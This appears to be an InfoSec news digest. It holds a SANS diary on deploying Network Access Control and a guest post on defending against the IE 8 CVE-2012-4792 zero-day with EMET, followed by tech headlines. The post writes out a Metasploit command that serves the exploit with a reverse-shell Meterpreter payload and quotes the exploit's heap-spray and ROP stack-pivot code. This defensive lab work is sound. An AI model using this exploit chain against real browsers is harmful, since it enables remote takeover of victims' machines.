InfoSec News

Further expanding from its core mission of providing Linux distributions for desktop computers and servers, Canonical is developing a version of Ubuntu for smartphones.
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Network Access Control (NAC) is a powerful control for regulating access to corporate network resources. Some of the goals of a NAC implementation are:

Mitigation of zero-day attacks: devices without antivirus, host IPS, patches, the security baseline or specific required software are considered malicious or in breach of security policy and should not be allowed onto the corporate network.

Policy enforcement: because NAC uses 802.1X, it can place the user in a specific VLAN, and the network firewall can then enforce further access controls inside the corporate network.

Identity and access management: combined with strong authentication, it can ensure that only authorized computers, and only authorized users on specific computers, can reach the corporate network and its resources.

I decided to implement this control inside my corporate network as it addresses many of the risks that affect or could affect my company. In this diary I will describe my experience with the implementation and how to determine which NAC solution best fits your needs. To start, I designed the following test plan to ensure the NAC solution fits my information security model:

Only the Network Access Zone (NAZ) column of the test-plan table survived; the other columns (the Managed, Authentication and Health inputs defined below) are missing. The NAZ outcomes it listed, in order, were:

Assigned VLAN to user
Guest VLAN
Guest VLAN
Pre-Admission VLAN
VLAN redirection according to the registration. If MAC is not registered, access is denied.
Let's define some terms used in the table above:

Managed: whether the device is managed by the corporation. Examples are members of the Windows domain or devices managed by mobile device management software.

Authentication: NAC authentication can be performed for both the user and the computer using 802.1X. If 802.1X is not available, the MAC address is used.

Health: a set of predefined policies enforced by checking the compliance of the device being authenticated to the network. Health is OK when the device complies with the defined policies and bad when one or more policies are not met.

The NAC solution provides two portals:

Guest portal: used to authenticate devices that are not managed but are authorized to enter the network, and the external users owning or using those devices.

Remediation portal: when the device does not meet the required policies, it is redirected to the remediation portal so that the non-compliant configuration or parameters on the device can be fixed.

Both portals imply that any device authenticating to the network through them does so manually; no servers or critical devices must authenticate this way.

My experience with NAC implementation comes from the purchase my company made of McAfee N-550 boxes. So far, we have had the following problems:

IP phones must authenticate using 802.1X, and the voice VLAN must be configured and different from the data VLAN. Link Layer Discovery Protocol (LLDP) must be enabled. See http://www.cisco.com/en/US/docs/switches/lan/catalyst3750x_3560x/software/release/15.0_1_se/configuration/guide/swvoip.html for more information on this configuration on Catalyst 3750 switches and http://www.h3c.com/portal/Technical_Support___Documents/Technical_Documents/WLAN/Access_Controller/H3C_WX3000_Series_Unified_Switches/Configuration/Operation_Manual/H3C_WX3000_CG-6W103/201007/685276_1285_0.htm for H3C devices. Also keep in mind that the phone must support separate voice and data VLANs for the computer attached to it; check your IP phone documentation.

The guest portal does not work in Internet Explorer 8 and 9. This was solved by a patch released by the McAfee NAC developer team.

The out-of-band redundant configuration duplicates the records of authenticated devices when the redundant node activates. The first answer we got from McAfee was that this is the expected behaviour of redundant operation and the only workaround was to place filters in the Threat Analyzer Console. I must admit I was surprised by that answer, because I cannot understand how McAfee can officially recommend a manual display filter on the logs, losing the real-time reporting to the security event correlator and therefore degrading my incident-response capabilities. I rejected that answer and as of today I am still waiting for a solution.

Authenticated devices whose initial health state was bad and was then fixed do not get a new IP address in the VLAN assigned to the user, because RADIUS Change of Authorization (CoA) somehow is not working correctly with the NAC solution. Still waiting for an official response on this issue.

So, how can you determine which NAC solution fits best to your needs?

Smooth network integration is very important. Ensure that your test plan works within your network and that 802.1X operates smoothly between your RADIUS server, switch, device and user. Don't forget to test RADIUS CoA, and ensure that VoIP devices support 802.1X and specifically dynamic voice and data VLAN configuration. Make sure you have support from your vendor, because NAC troubleshooting is usually very low-level and the technical abilities of the support staff must be really advanced.

Define your network security policy and test whether your NAC tool can validate each setting you need for your devices. If you have unusual devices that cannot join a Windows domain, make 100% sure that they at least support 802.1X. Otherwise you will be in trouble, allowing exceptions that might be the starting point of your future information security incidents. MAC authentication should not be an option, as it can easily be faked.

Make sure the entire NAC process flows and no issues arise, such as no DHCP negotiation after the health state changes from bad to OK.
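The admission decision the test plan exercises, written out as an added example in C that is not the diary's table or McAfee's product logic: the mapping from managed state, authentication method, MAC registration and health to a Network Access Zone is one assumed policy, and coa_required captures the bad-to-OK health transition above that needs a RADIUS CoA and a fresh DHCP lease.

```c
#include <stdbool.h>
#include <stdio.h>

/* Added example (not the diary's own table or the McAfee product logic):
 * one assumed mapping from the diary's inputs (Managed, Authentication,
 * Health, MAC registration) to its Network Access Zones. The pre-admission
 * VLAN feeds the remediation portal, the guest VLAN the guest portal. */

typedef enum { AUTH_8021X, AUTH_MAC } auth_t;
typedef enum { HEALTH_OK, HEALTH_BAD } health_t;
typedef enum { NAZ_DENY, NAZ_ASSIGNED_VLAN, NAZ_GUEST_VLAN, NAZ_PRE_ADMISSION_VLAN } naz_t;

typedef struct {
    bool     managed;        /* in the Windows domain or under MDM */
    auth_t   auth;           /* 802.1X if supported, otherwise MAC */
    bool     mac_registered; /* only meaningful for AUTH_MAC */
    health_t health;         /* result of the policy compliance check */
} device_t;

/* Decide the zone for one authentication attempt (assumed policy). */
naz_t admit(const device_t *d) {
    if (d->auth == AUTH_MAC) {
        /* Fallback path the diary warns about: a MAC is easily faked, so an
         * unregistered MAC is denied and a registered one is only redirected. */
        return d->mac_registered ? NAZ_GUEST_VLAN : NAZ_DENY;
    }
    if (!d->managed)
        return NAZ_GUEST_VLAN;  /* unmanaged 802.1X device: guest portal */
    return d->health == HEALTH_OK ? NAZ_ASSIGNED_VLAN : NAZ_PRE_ADMISSION_VLAN;
}

/* The failure mode from the diary: after remediation the health flips from
 * BAD to OK, so the zone changes. A zone change needs a RADIUS CoA so the
 * switch re-authorises the port and the device obtains a new lease in the
 * new VLAN. Returns true when CoA (and a DHCP renewal) is required. */
bool coa_required(const device_t *before, const device_t *after) {
    return admit(before) != admit(after);
}

int main(void) {
    device_t laptop = { true, AUTH_8021X, false, HEALTH_BAD };
    printf("managed laptop, bad health -> zone %d (pre-admission)\n", admit(&laptop));
    device_t fixed = laptop;
    fixed.health = HEALTH_OK;
    printf("after remediation, CoA needed: %s\n", coa_required(&laptop, &fixed) ? "yes" : "no");
    device_t printer = { false, AUTH_MAC, false, HEALTH_OK };
    printf("unregistered MAC-only device -> zone %d (deny)\n", admit(&printer));
    return 0;
}
```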

What is the NAC solution you have found most valuable? Have you had smooth NAC implementations? Let us know!

Manuel Humberto Santander Peláez

SANS Internet Storm Center - Handler



e-mail: msantand at isc dot sans dot org

Following is a guest post from TJ O'Connor, author of Violent Python, SANS Technical Institute graduate, and GSE.

So it's probably worth talking about the recent IE 8.0 0-day. While the use-after-free exploit specifically targets IE 6 through IE 8, it is worth mentioning because of its widespread use in targeted attacks seen in the US, China, and Taiwan. The security company FireEye found the exploit planted on a compromised page on the Council on Foreign Relations website, among other locations.

As a defender, you probably find yourself asking the wrong questions when it comes to defending against this exploit. Is there a patch available? What is the Microsoft-approved Fixit solution until a patch can be developed? Is there an antivirus signature for it? Don't fret: as previously noted, Microsoft TechNet has a temporary fix in place. While useful in preventing this specific attack, the fix is the wrong way of thinking about a solution to the bigger problem. As a defender, you need to start understanding that 0-day is out there. It is going to continue to be out there, and you need the mechanisms in place to stop 0-day. That's a slightly arrogant statement, considering we define 0-day as a previously unknown computer virus for which antivirus signatures are not yet available. So how do you defend against what you cannot define?

To succeed, we must really look at the attack through the eyes of the attacker. The team over at Metasploit recently developed an open source version of the exploit for use in their framework. Let's use it as a starting point to examine how we can prevent this attack without a readily available patch (or, for that matter, prevent further attacks). We begin our examination by using the Metasploit framework to stand up a malicious web server hosting the exploit. The command below starts a handler on our lab host on TCP port 8282. If the exploit succeeds, it delivers the malicious Meterpreter payload to our host on TCP port 1337.

msfcli exploit/windows/browser/ie_cbutton_uaf SRVHOST= SRVPORT=8282 payload=windows/Meterpreter/reverse_tcp LPORT=1337 LHOST= E

We fire up a freshly patched and updated Windows XP SP3 machine running the newest version of Internet Explorer 8 to serve as a victim, and browse to the malicious web server created by the Metasploit framework.

When the victim browses to our malicious server, we see the Metasploit framework send a malicious HTML page specifically targeted at Windows XP SP3 (based on our user agent string). After about sixty seconds or so of heap spraying, we see the exploit succeed and open a Meterpreter session on our victim.

The source code for the Metasploit version of the exploit can be found on their online repository.

Let's examine a couple of key aspects of the source before proceeding, to understand this particular exploit. We know the vulnerability is a use-after-free. Combined with a technique known as heap spraying, the Metasploit exploit essentially sprays the heap with malicious executable code, with the intent that this code runs when the use-after-free crash is triggered. Note the Metasploit exploit source code: first, the exploit defines a payload (Meterpreter in our case above) and then passes it to a function that creates JavaScript code to spray the heap of the Internet Explorer process.

    def load_exploit_html(my_target, cli)
      p  = get_payload(my_target, cli)   # the payload chosen on the command line (Meterpreter above)
      js = ie_heap_spray(my_target, p)   # JavaScript that sprays the IE heap with that payload
      # ...
    end

As you look further into the source code for the exploit, you'll notice it also uses a technique known as ROP, or Return Oriented Programming. Security researcher Dino Dai Zovi provides an excellent overview of ROP use in exploits in his paper Practical Return Oriented Programming. Essentially, it is a technique of reusing small bits of already existing instructions, each followed by a return instruction, for a malicious purpose when code cannot be placed on the program's stack because of security mechanisms such as Microsoft's Data Execution Prevention (DEP). ROP is commonly used in modern exploits, so it's no surprise to see it here. In fact, it uses a common ROP chain, found in the msvcrt dynamic link library, to create a stack pivot.

    # Both ROP chains generated by mona.py - See corelan.be
    case t['Rop']
    when :msvcrt
      print_status("Using msvcrt ROP")
      if t.name =~ /Windows XP/
        stack_pivot  = [0x77c15ed6].pack('V') * 54  # ret
        stack_pivot << [0x77c2362c].pack('V')       # pop ebx # ret
        stack_pivot << [0x77c15ed5].pack('V')       # xchg eax,esp # ret # 0x0c0c0c0c
      end
      rop_payload = generate_rop_payload('msvcrt', code, {'pivot' => stack_pivot, 'target' => 'xp'})
    end

At this point, you may start seeing why we need to protect differently against novel exploits such as the recent CVE-2012-4792. We cannot continue to defend against each particular exploit by developing and deploying a patch or signature. Rather, we should be defending against the more general techniques used in the delivery of the exploit. In this case, we saw a heap spray as well as ROP.

The team at Microsoft is looking in the same direction. Matt Miller from Microsoft gave an excellent presentation this summer on how Windows 8 would begin defending against exploits; it's worth checking out.

Taking a cue from Microsoft, we download and install the Microsoft Enhanced Mitigation Experience Toolkit (EMET) 3.5 from http://www.microsoft.com/en-us/download/details.aspx?id=30424.

EMET is a tool designed by the Microsoft team to look specifically for the techniques, such as heap spraying and ROP, used to bypass popular mechanisms such as Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP). Firing up the tool, we choose to enable different exploit protection mechanisms such as enforcing hardware-based DEP, ensuring safe structured exception handling, and detecting heap sprays. In this case, we are going to protect the Internet Explorer 8 web browser attacked in CVE-2012-4792.

Repeating the exploit with EMET 3.5 running, we see an interesting notification before Internet Explorer gracefully terminates: EMET detects the heap spray and terminates the process.

OK. But what if the exploit didn't include a heap spray? We disable heap-spray detection and repeat the exploit. This time, we choose to mitigate ROP attacks by looking for a technique known as a stack pivot (you may remember it from the exploit source code). The exploit still fails, as EMET detects the stack pivot.

Maybe it doesn't use a stack pivot. Maybe it uses some unheard-of technique that bypasses DEP by calling one of the several Win32 API functions that can turn off DEP, such as VirtualProtect(). Nope! Again, EMET detects the call, notices that it was made from a user-land process and not the kernel, terminates Internet Explorer and notifies the user.

Moral of the story: we continue to look at defense in the wrong light. We don't need signatures for every exploit to prevent them from succeeding. We don't need teams developing patches and hotfixes in a 48-hour rush over the New Year holiday. We don't need to race to deploy the patches or hotfixes on production systems. Instead, we need to begin understanding the way attackers attack, and the methods and means they use to defeat exploit protections, and attack those methods. Microsoft knows this. It's probably why they hired Matt Miller, originally the third developer at Metasploit. Miller, who published great exploit research including a means of bypassing hardware-enforced DEP, has now joined Microsoft in giving us a tool to defend against exploits: EMET 3.5. Check it out and start rethinking the way you defend!
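The stack-pivot check that EMET applies in the second test above, as an added example in C that is not taken from EMET or from the Metasploit module: it reads the thread's real stack bounds (from Linux /proc/self/maps, an assumption standing in for the thread environment block a Windows mitigation would consult) and flags a stack pointer that has been swapped to the sprayed heap address 0x0c0c0c0c; the 0x0012c000-0x00130000 stack range in the constructed case is made up.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not EMET's or Metasploit's code: the check behind a
 * StackPivot mitigation. Before a sensitive API (think VirtualProtect)
 * proceeds, the caller's stack pointer is compared with the thread's real
 * stack bounds. After "xchg eax,esp # ret", ESP points into the sprayed
 * heap (0x0c0c0c0c in the Metasploit module), far outside those bounds. */

typedef struct { uintptr_t lo, hi; } stack_bounds_t;

/* Core decision: a stack pointer outside [lo, hi) means the stack was pivoted. */
bool sp_is_pivoted(uintptr_t sp, const stack_bounds_t *b) {
    return sp < b->lo || sp >= b->hi;
}

/* Linux only (assumption): read the main thread's stack region from
 * /proc/self/maps, standing in for the TEB stack limits used on Windows. */
static bool main_stack_bounds(stack_bounds_t *b) {
    FILE *f = fopen("/proc/self/maps", "r");
    char line[512];
    bool found = false;
    if (!f) return false;
    while (fgets(line, sizeof line, f)) {
        unsigned long lo, hi;
        if (strstr(line, "[stack]") && sscanf(line, "%lx-%lx", &lo, &hi) == 2) {
            b->lo = lo; b->hi = hi; found = true;
            break;
        }
    }
    fclose(f);
    return found;
}

/* The address of a local is a good-enough stand-in for the live stack pointer. */
static uintptr_t current_sp(void) { volatile int marker = 0; return (uintptr_t)&marker; }

/* A legitimate caller running on the real stack must pass the check. */
bool legitimate_caller_passes(void) {
    stack_bounds_t b;
    return main_stack_bounds(&b) && !sp_is_pivoted(current_sp(), &b);
}

/* Constructed case: ESP swapped to the spray address while the thread's
 * stack (a made-up range) sits at 0x0012c000-0x00130000. */
bool sprayed_heap_sp_is_flagged(void) {
    stack_bounds_t b = { 0x0012c000u, 0x00130000u };
    return sp_is_pivoted(0x0c0c0c0cu, &b);
}

int main(void) {
    printf("legitimate caller passes: %s\n", legitimate_caller_passes() ? "yes" : "no");
    printf("heap-spray ESP flagged:   %s\n", sprayed_heap_sp_is_flagged() ? "yes" : "no");
    return 0;
}
```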

TJ O'Connor @ViolentPython
The annual Consumer Electronics Show in Las Vegas gets under way this weekend with big announcements from gadget makers keen to wow and convince us they have the next big thing. But it's worth remembering that some of the promises and predictions made at CES are about as solid as many New Year's resolutions.
Apple will launch the next iPhone in May or June 2013, offering multiple colors and screen sizes in a move that would depart from a six-year practice, a Wall Street analyst said today.
Google and Kia Motors America jointly announced Wednesday a deal to integrate Google Maps and Google Places into Kia automobiles.
The fiscal cliff deal in Congress extended the R&D tax credit, but, once again, sidestepped any move to make it permanent.
Apple's App Store had the top score among mobile application storefronts ranked by ABI Research, but Microsoft's Windows Store narrowly beat the field for its degree of innovation.
Hewlett-Packard will continue to evaluate potential divestitures of underperforming parts of its business, and the process could get messy, the company warned its investors in its annual 10-K document, which was filed in late December.
Gibbs reviews his predictions from last year and surveys the more than 400 predictions that he's been sent by IT professionals
Maybe you charge through your plans with Patton-like precision, planning everything down to the minute. Or, like Marilyn Monroe, perhaps you've "been on a calendar, but never on time." It really doesn't matter which approach you take: Google Calendar can fit your style.
Imation, a storage and data security company, has acquired Nexsan, a vendor of disk-based storage systems, in a deal worth about US$120 million, the company announced.
Hewlett-Packard reduced its workforce last year by 17,800 employees, more than half way to its restructuring goal.
Final online usage numbers for 2012 released Tuesday confirmed that Windows 8 failed to match Windows Vista's uptake pace during its first two months.
WordPress WP Photo Album Plus Plugin Cross Site Scripting Vulnerability
[ MDVSA-2013:001 ] gnupg
Tobii Technology will soon start shipping a device that allows users to control a PC using their eyes. Developers will be able to buy the REX next week, and Tobii will make it more widely available in the second half of the year, the company said Wednesday
There were 123 heads of state and governments using Twitter to communicate with citizens and the rest of the world as of December 2012, a think tank said Tuesday.
If poor Wi-Fi performance in your busy office is a problem for your organization, smart Wi-Fi is worth investigating. Here's why one company ripped out its Cisco wireless network gear and went with a new hardware-and-software-based Wi-Fi approach.
Reader Steven Harris is trying to do the right thing by his family, but technical barriers prevent it. He writes:
In the last Ask the iTunes Guy column of the year, I look at playlist views, a quick way to make playlists from folders of songs, adding tags to your tracks, and how to see the duration of selected tracks in iTunes 11.
ShakaCon 2013 - Call for Papers
Re: GnuPG 1.4.12 and lower - memory access errors and keyring database corruption


Top 10 Influencers in Financial InfoSec. Our Inaugural List of Financial Services Security Leaders. By Tracy Kitten, January 2, 2013.

ircd-ratbox 'm_capab.c' Denial of Service Vulnerability
A multi-year effort to re-architect 47-year-old mainframe-based legacy software around a service-oriented architecture moved from build to buy. Here's why.
U.S. mobile trade group CTIA will combine its two annual trade shows starting in 2014 as it tries to attract a bigger share of the world's interest in smartphones, apps and other hot technologies.
Netflix, which faced an interruption of its video streaming service on Christmas Eve, had problems again on Monday related to its DVD website.
Apple raised CEO Tim Cook's salary by 55% for 2012 and awarded him a $2.8 million bonus, but said the chief executive's pay was still 'significantly below the median' of comparable firms.
A security expert discovered severe vulnerabilities when analysing two Samsung Smart TVs

At the 29C3 hacker congress, Berlin-based security researchers Karsten Nohl and dexter have presented a custom-built workstation for "microprobing" semiconductors; such equipment has so far only been available in specialised labs

Google Chrome Prior to 23.0.1271.64 Multiple Security Vulnerabilities